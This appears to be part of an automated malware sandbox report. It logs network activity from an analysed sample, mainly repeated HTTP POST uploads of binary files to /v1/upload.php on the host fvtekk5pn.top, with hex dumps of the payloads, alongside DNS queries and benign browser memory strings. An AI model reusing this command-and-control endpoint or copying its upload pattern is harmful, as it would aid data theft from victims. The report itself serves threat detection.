0c 91 a9 38 26 f1 e0 ce 8f f4 52 29 b5 a0 97 6c d2 68 ed 69 0b 2c 99 9e ae 22 9a eb e4 31 ac d4 80 8d 4c 4e f0 55 ed 10 80 d1 e6 ee 3a 89 0c c2 8c 9a b4 9d 1c 7d 3a 6a 66 dc 94 df e4 3c fc 91 5a 6b 1c d7 66 95 61 8c 9b 99 70 5b 73 44 af 46 21 c2 de 92 a2 8b 10 02 9f c0 4b 95 24 d4 66 f5 a6 d4 68 59 f4 9a 8d ee 2b 4a 25 1b d5 98 7d 54 db 88 e6 84 2d 4b b8 e5 35 5a c9 0a 8c bc b0 42 b7 3b c7 f1 5b 87 d9 a3 a0 1c 64 7b 67 8e 87 28 88 98 1a 86 db 56 db 7f 3b 77 db 10 7b 1c 08 17 48 0c ab 9c cc b9 8d e0 c0 5c bf 93 a5 43 8d b6 13 3a 03 d7 6b bf 9b e2 59 bc ab 15 04 ab 4e 96 4e 71 42 ca ee 1c 4f ce ad 41 a9 71 00 68 f4 09 c5 cd b5 39 f5 47 50 e6 fe 56 d7 0b e5 a6 3f 8a 98 02 4f 21 8d 61 cc 46 1d df e8 e5 e7 09 9d b5 f6 a0 77 89 21 ee 19 93 de f9 35 a2 13 e4 b6 35 15 05 2b 59 04 f8 92 00 5a ff 2e 9c 6a fb 43 b4 89 b3 25 9b 20 56 6b fd a7 f2 45 e9 1c 5a 6c e4 9b df 6a 84 e7 5f a5 a8 11 5f 2a 34 bd f6 c7 4e c9 e9 00 20 69 44 e9 2b a8 95 34 8f 88 9d a5 8c c6 6f f0 58 35 ba 4b 08 1d 17 69 f3 88 15 7b 11 7e b6 b3 38 f1 df 32 5b 90 ca f1 11 7a c3 33 92 f6 e1 40 90 af ba b6 23 ea 8f 92 19 a3 07 1e 62 d1 4d 71 7c ec 6a 4e 31 86 17 a4 1c 6f 40 41 b4 1f f0 c9 31 f7 b4 92 ee 3e d6 0c f0 d0 c6 16 60 4a 36 b9 35 3a 5b ee d4 dc 7c 13 eb c0 80 67 12 20 a7 86 63 03 43 50 65 6b 30 f6 67 30 f6 53 f9 54 3e c2 11 d7 85 f8 21 37 d7 a7 34 83 c3 1b c0 ed 93 f3 31 fe 13 d9 3f dc 8b 9b 3c 9e 3a 72 ad 67 71 91 5d c9 2a 91 4e ca 16 2e cd 8f e8 96 21 48 c6 7e 36 74 c2 27 1c 4a c1 c3 2f d1 54 91 3b 34 44 21 9d 68 59 a0 87 fc 9d 08 30 72 b9 7e e4 da 93 2f 06 37 69 d8 75 b8 3c 21 b8 be d5 10 2c 5d 27 a0 98 83 5c 7a b3 88 52 5c ba 8f 18 8b ae 11 c9 09 54 cb 02 14 52 49 3a e1 54 4f 43 d8 3a 01 a0 d3 55 ad 59 67 24 3c df a0 47 c5 fc fb 87 b2 cf b0 39 12 24 2c 86 e3 dc df bf 42 bc d7 38 e7 15 e0 fb f7 64 77 c4 6c c5 73 00 8a 50 db bb aa 9b 4d 97 da b5 1a c0 84 fe c4 c8 c3 14 ad ea 92 2e ac 52 df 64 41 44 5d 59 31 7b 5c 92 73 b3 3f 4a 0a b1 4f 64 43 f1 10 cd b1 d4 b4 1a 24 03 f1 67 37 7d 59 ea d0 9f 4a e4 00 a5 91 7d 1f c4 8e 13 47 b0 48 db 13 90 a2 6e df eb 7e 42 30 71 1a 30 0b 34 e8 06 93 f3 5d 35 42 02 cc 2d 10 1b b2 1f 9b 34 38 7f 9b cd db 83 03 a3 b6 38 ef 7c ee e5 7f 0b 6b 63 b4 fc dd 51 31 dd 34 9c
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27815Content-Type: multipart/form-data; boundary=------------------------FyuPCKo31SNkXFO1Pv2dWhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 79 75 50 43 4b 6f 33 31 53 4e 6b 58 46 4f 31 50 76 32 64 57 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 6e 65 64 61 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b a5 8c 6c 6d e2 74 41 7a 37 8c dc 47 9f 34 7d 75 0f 38 5e 14 77 13 ba c6 7e 15 79 38 b4 da 15 b6 8e 56 69 4c b3 81 80 33 14 0c 91 a9 38 26 f1 e0 ce 8f f4 52 29 b5 a0 97 6c d2 68 ed 69 0b 2c 99 9e ae 22 9a eb e4 31 ac d4 80 8d 4c 4e f0 55 ed 10 80 d1 e6 ee 3a 89 0c c2 8c 9a b4 9d 1c 7d 3a 6a 66 dc 94 df e4 3c fc 91 5a 6b 1c d7 66 95 61 8c 9b 99 70 5b 73 44 af 46 21 c2 de 92 a2 8b 10 02 9f c0 4b 95 24 d4 66 f5 a6 d4 68 59 f4 9a 8d ee 2b 4a 25 1b d5 98 7d 54 db 88 e6 84 2d 4b b8 e5 35 5a c9 0a 8c bc b0 42 b7 3b c7 f1 5b 87 d9 a3 a0 1c 64 7b 67 8e 87 28 88 98 1a 86 db 56 db 7f 3b 77 db 10 7b 1c 08 17 48 0c ab 9c cc b9 8d e0 c0 5c bf 93 a5 43 8d b6 13 3a 03 d7 6b bf 9b e2 59 bc ab 15 04 ab 4e 96 4e 71 42 ca ee 1c 4f ce ad 41 a9 71 00 68 f4 09 c5 cd b5 39 f5 47 50 e6 fe 56 d7 0b e5 a6 3f 8a 98 02 4f 21 8d 61 cc 46 1d df e8 e5 e7 09 9d b5 f6 a0 77 89 21 ee 19 93 de f9 35 a2 13 e4 b6 35 15 05 2b 59 04 f8 92 00 5a ff 2e 9c 6a fb 43 b4 89 b3 25 9b 20 56 6b fd a7 f2 45 e9 1c 5a 6c e4 9b df 6a 84 e7 5f a5 a8 11 5f 2a 34 bd f6 c7 4e c9 e9 00 20 69 44 e9 2b a8 95 34 8f 88 9d a5 8c c6 6f f0 58 35 ba 4b 08 1d 17 69 f3 88 15 7b 11 7e b6 b3 38 f1 df 32 5b 90 ca f1 11 7a c3 33 92 f6 e1 40 90 af ba b6 23 ea 8f 92 19 a3 07 1e 62 d1 4d 71 7c ec 6a 4e 31 86 17 a4 1c 6f 40 41 b4 1f f0 c9 31 f7 b4 92 ee 3e d6 0c f0 d0 c6 16 60 4a 36 b9 35 3a 5b ee d4 dc 7c 13 eb c0 80 67 12 20 a7 86 63 03 43 50 65 6b 30 f6 67 30 f6 53 f9 54 3e c2 11 d7 85 f8 21 37 d7 a7 34 83 c3 1b c0 ed 93 f3 31 fe 13 d9 3f dc 8b 9b 3c 9e 3a 72 ad 67 71 91 5d c9 2a 91 4e ca 16 2e cd 8f e8 96 21 48 c6 7e 36 74 c2 27 1c 4a c1 c3 2f d1 54 91 3b 34 44 21 9d 68 59 a0 87 fc 9d 08 30 72 b9 7e e4 da 93 2f 06 37 69 d8 75 b8 3c 21 b8 be d5 10 2c 5d 27 a0 98 83 5c 7a b3 88 52 5c ba 8f 18 8b ae 11 c9 09 54 cb 02 14 52 49 3a e1 54 4f 43 d8 3a 01 a0 d3 55 ad 59 67 24 3c df a0 47 c5 fc fb 87 b2 cf b0 39 12 24 2c 86 e3 dc df bf 42 bc d7 38 e7 15 e0 fb f7 64 77 c4 6c c5 73 00 8a 50 db bb aa 9b 4d 97 da b5 1a c0 84 fe c4 c8 c3 14 ad ea 92 2e ac 52 df 64 41 44 5d 59 31 7b 5c 92 73 b3 3f 4a 0a b1 4f 64 43 f1 10 cd b1 d4 b4 1a 24 03 f1 67 37 7d 59 ea d0 9f 4a e4 00 a5 91 7d 1f c4 8e 13 47 b0 48 db 13 90 a2 6e df eb 7e 42 30 71 1a 30 0b 34 e8 06 93 f3 5d 35 42 02 cc 2d 10 1b b2 1f 9b 34 38 7f 9b cd db 83 03 a3 b6 38 ef 7c ee e5 7f 0b 6b 63 b4 fc dd 51 31 dd 34 9c
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27815Content-Type: multipart/form-data; boundary=------------------------FyuPCKo31SNkXFO1Pv2dWhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 79 75 50 43 4b 6f 33 31 53 4e 6b 58 46 4f 31 50 76 32 64 57 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 6e 65 64 61 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b a5 8c 6c 6d e2 74 41 7a 37 8c dc 47 9f 34 7d 75 0f 38 5e 14 77 13 ba c6 7e 15 79 38 b4 da 15 b6 8e 56 69 4c b3 81 80 33 14 0c 91 a9 38 26 f1 e0 ce 8f f4 52 29 b5 a0 97 6c d2 68 ed 69 0b 2c 99 9e ae 22 9a eb e4 31 ac d4 80 8d 4c 4e f0 55 ed 10 80 d1 e6 ee 3a 89 0c c2 8c 9a b4 9d 1c 7d 3a 6a 66 dc 94 df e4 3c fc 91 5a 6b 1c d7 66 95 61 8c 9b 99 70 5b 73 44 af 46 21 c2 de 92 a2 8b 10 02 9f c0 4b 95 24 d4 66 f5 a6 d4 68 59 f4 9a 8d ee 2b 4a 25 1b d5 98 7d 54 db 88 e6 84 2d 4b b8 e5 35 5a c9 0a 8c bc b0 42 b7 3b c7 f1 5b 87 d9 a3 a0 1c 64 7b 67 8e 87 28 88 98 1a 86 db 56 db 7f 3b 77 db 10 7b 1c 08 17 48 0c ab 9c cc b9 8d e0 c0 5c bf 93 a5 43 8d b6 13 3a 03 d7 6b bf 9b e2 59 bc ab 15 04 ab 4e 96 4e 71 42 ca ee 1c 4f ce ad 41 a9 71 00 68 f4 09 c5 cd b5 39 f5 47 50 e6 fe 56 d7 0b e5 a6 3f 8a 98 02 4f 21 8d 61 cc 46 1d df e8 e5 e7 09 9d b5 f6 a0 77 89 21 ee 19 93 de f9 35 a2 13 e4 b6 35 15 05 2b 59 04 f8 92 00 5a ff 2e 9c 6a fb 43 b4 89 b3 25 9b 20 56 6b fd a7 f2 45 e9 1c 5a 6c e4 9b df 6a 84 e7 5f a5 a8 11 5f 2a 34 bd f6 c7 4e c9 e9 00 20 69 44 e9 2b a8 95 34 8f 88 9d a5 8c c6 6f f0 58 35 ba 4b 08 1d 17 69 f3 88 15 7b 11 7e b6 b3 38 f1 df 32 5b 90 ca f1 11 7a c3 33 92 f6 e1 40 90 af ba b6 23 ea 8f 92 19 a3 07 1e 62 d1 4d 71 7c ec 6a 4e 31 86 17 a4 1c 6f 40 41 b4 1f f0 c9 31 f7 b4 92 ee 3e d6 0c f0 d0 c6 16 60 4a 36 b9 35 3a 5b ee d4 dc 7c 13 eb c0 80 67 12 20 a7 86 63 03 43 50 65 6b 30 f6 67 30 f6 53 f9 54 3e c2 11 d7 85 f8 21 37 d7 a7 34 83 c3 1b c0 ed 93 f3 31 fe 13 d9 3f dc 8b 9b 3c 9e 3a 72 ad 67 71 91 5d c9 2a 91 4e ca 16 2e cd 8f e8 96 21 48 c6 7e 36 74 c2 27 1c 4a c1 c3 2f d1 54 91 3b 34 44 21 9d 68 59 a0 87 fc 9d 08 30 72 b9 7e e4 da 93 2f 06 37 69 d8 75 b8 3c 21 b8 be d5 10 2c 5d 27 a0 98 83 5c 7a b3 88 52 5c ba 8f 18 8b ae 11 c9 09 54 cb 02 14 52 49 3a e1 54 4f 43 d8 3a 01 a0 d3 55 ad 59 67 24 3c df a0 47 c5 fc fb 87 b2 cf b0 39 12 24 2c 86 e3 dc df bf 42 bc d7 38 e7 15 e0 fb f7 64 77 c4 6c c5 73 00 8a 50 db bb aa 9b 4d 97 da b5 1a c0 84 fe c4 c8 c3 14 ad ea 92 2e ac 52 df 64 41 44 5d 59 31 7b 5c 92 73 b3 3f 4a 0a b1 4f 64 43 f1 10 cd b1 d4 b4 1a 24 03 f1 67 37 7d 59 ea d0 9f 4a e4 00 a5 91 7d 1f c4 8e 13 47 b0 48 db 13 90 a2 6e df eb 7e 42 30 71 1a 30 0b 34 e8 06 93 f3 5d 35 42 02 cc 2d 10 1b b2 1f 9b 34 38 7f 9b cd db 83 03 a3 b6 38 ef 7c ee e5 7f 0b 6b 63 b4 fc dd 51 31 dd 34 9c
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27815Content-Type: multipart/form-data; boundary=------------------------FyuPCKo31SNkXFO1Pv2dWhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 79 75 50 43 4b 6f 33 31 53 4e 6b 58 46 4f 31 50 76 32 64 57 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 6e 65 64 61 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b a5 8c 6c 6d e2 74 41 7a 37 8c dc 47 9f 34 7d 75 0f 38 5e 14 77 13 ba c6 7e 15 79 38 b4 da 15 b6 8e 56 69 4c b3 81 80 33 14 0c 91 a9 38 26 f1 e0 ce 8f f4 52 29 b5 a0 97 6c d2 68 ed 69 0b 2c 99 9e ae 22 9a eb e4 31 ac d4 80 8d 4c 4e f0 55 ed 10 80 d1 e6 ee 3a 89 0c c2 8c 9a b4 9d 1c 7d 3a 6a 66 dc 94 df e4 3c fc 91 5a 6b 1c d7 66 95 61 8c 9b 99 70 5b 73 44 af 46 21 c2 de 92 a2 8b 10 02 9f c0 4b 95 24 d4 66 f5 a6 d4 68 59 f4 9a 8d ee 2b 4a 25 1b d5 98 7d 54 db 88 e6 84 2d 4b b8 e5 35 5a c9 0a 8c bc b0 42 b7 3b c7 f1 5b 87 d9 a3 a0 1c 64 7b 67 8e 87 28 88 98 1a 86 db 56 db 7f 3b 77 db 10 7b 1c 08 17 48 0c ab 9c cc b9 8d e0 c0 5c bf 93 a5 43 8d b6 13 3a 03 d7 6b bf 9b e2 59 bc ab 15 04 ab 4e 96 4e 71 42 ca ee 1c 4f ce ad 41 a9 71 00 68 f4 09 c5 cd b5 39 f5 47 50 e6 fe 56 d7 0b e5 a6 3f 8a 98 02 4f 21 8d 61 cc 46 1d df e8 e5 e7 09 9d b5 f6 a0 77 89 21 ee 19 93 de f9 35 a2 13 e4 b6 35 15 05 2b 59 04 f8 92 00 5a ff 2e 9c 6a fb 43 b4 89 b3 25 9b 20 56 6b fd a7 f2 45 e9 1c 5a 6c e4 9b df 6a 84 e7 5f a5 a8 11 5f 2a 34 bd f6 c7 4e c9 e9 00 20 69 44 e9 2b a8 95 34 8f 88 9d a5 8c c6 6f f0 58 35 ba 4b 08 1d 17 69 f3 88 15 7b 11 7e b6 b3 38 f1 df 32 5b 90 ca f1 11 7a c3 33 92 f6 e1 40 90 af ba b6 23 ea 8f 92 19 a3 07 1e 62 d1 4d 71 7c ec 6a 4e 31 86 17 a4 1c 6f 40 41 b4 1f f0 c9 31 f7 b4 92 ee 3e d6 0c f0 d0 c6 16 60 4a 36 b9 35 3a 5b ee d4 dc 7c 13 eb c0 80 67 12 20 a7 86 63 03 43 50 65 6b 30 f6 67 30 f6 53 f9 54 3e c2 11 d7 85 f8 21 37 d7 a7 34 83 c3 1b c0 ed 93 f3 31 fe 13 d9 3f dc 8b 9b 3c 9e 3a 72 ad 67 71 91 5d c9 2a 91 4e ca 16 2e cd 8f e8 96 21 48 c6 7e 36 74 c2 27 1c 4a c1 c3 2f d1 54 91 3b 34 44 21 9d 68 59 a0 87 fc 9d 08 30 72 b9 7e e4 da 93 2f 06 37 69 d8 75 b8 3c 21 b8 be d5 10 2c 5d 27 a0 98 83 5c 7a b3 88 52 5c ba 8f 18 8b ae 11 c9 09 54 cb 02 14 52 49 3a e1 54 4f 43 d8 3a 01 a0 d3 55 ad 59 67 24 3c df a0 47 c5 fc fb 87 b2 cf b0 39 12 24 2c 86 e3 dc df bf 42 bc d7 38 e7 15 e0 fb f7 64 77 c4 6c c5 73 00 8a 50 db bb aa 9b 4d 97 da b5 1a c0 84 fe c4 c8 c3 14 ad ea 92 2e ac 52 df 64 41 44 5d 59 31 7b 5c 92 73 b3 3f 4a 0a b1 4f 64 43 f1 10 cd b1 d4 b4 1a 24 03 f1 67 37 7d 59 ea d0 9f 4a e4 00 a5 91 7d 1f c4 8e 13 47 b0 48 db 13 90 a2 6e df eb 7e 42 30 71 1a 30 0b 34 e8 06 93 f3 5d 35 42 02 cc 2d 10 1b b2 1f 9b 34 38 7f 9b cd db 83 03 a3 b6 38 ef 7c ee e5 7f 0b 6b 63 b4 fc dd 51 31 dd 34 9c
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2120083764.000066180043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124768671.0000661800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119812456.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2120083764.000066180043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124768671.0000661800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119812456.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2119456616.00006618002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dFhHId9ZJ2TQWeyp3NN9sbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 7a 6f 74 6f 79 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 25 95 6c 45 0e b4 e6 c9 24 7b 8c 51 84 af 91 4f 81 ce f5 8b f8 41 fe 4d ff f4 7a 33 36 9d ef 04 9c 66 e2 d8 74 80 a5 28 ab ef 06 8f 14 b0 02 5f 53 c7 a0 d7 4c ee 1a c9 ac a9 86 d3 7c 3b 6e 68 d9 9e 4d c3 36 6a 48 d9 b7 09 c1 7e c3 9f 0a 13 0a 54 2e 90 37 73 9f 67 9b ca c7 8d 59 e1 36 02 38 e3 12 ac 37 51 d1 ba b2 27 7c b8 f0 c3 9f 23 41 17 4f 8d 8a 82 5a ed 77 87 7d 1b 55 21 42 1e d4 37 2c 40 46 35 4d c3 04 3f 14 60 80 79 61 c2 7e 71 0f 08 63 5d c9 fa 8f 86 f5 80 2e c9 c4 75 d1 9c 02 b0 29 cf b4 af 5e 34 5a b6 95 f2 c7 21 40 16 5b 4d a7 d7 e1 b9 fa 9c 28 e3 4d a8 1a 2f 61 22 21 0f a6 ae 56 10 b9 bf 10 ed 64 13 22 da 11 51 31 4a b9 d6 83 25 b7 65 99 6d 92 e7 86 32 89 13 47 cd b5 7d 8f a2 eb 91 20 03 3b 31 b3 f7 ea b8 58 a9 da 12 da 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 46 68 48 49 64 39 5a 4a 32 54 51 57 65 79 70 33 4e 4e 39 73 62 2d 2d 0d 0a Data Ascii: --------------------------dFhHId9ZJ2TQWeyp3NN9sbContent-Disposition: form-data; name="file"; filename="Zozotoya.bin"Content-Type: application/octet-stream%lE${QOAMz36ft(_SL|;nhM6jH~T.7sgY687Q'|#AOZw}U!B7,@F5M?`ya~qc].u)^4Z!@[M(M/a"!Vd"Q1J%em2G} ;1X1--------------------------dFhHId9ZJ2TQWeyp3NN9sb--
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
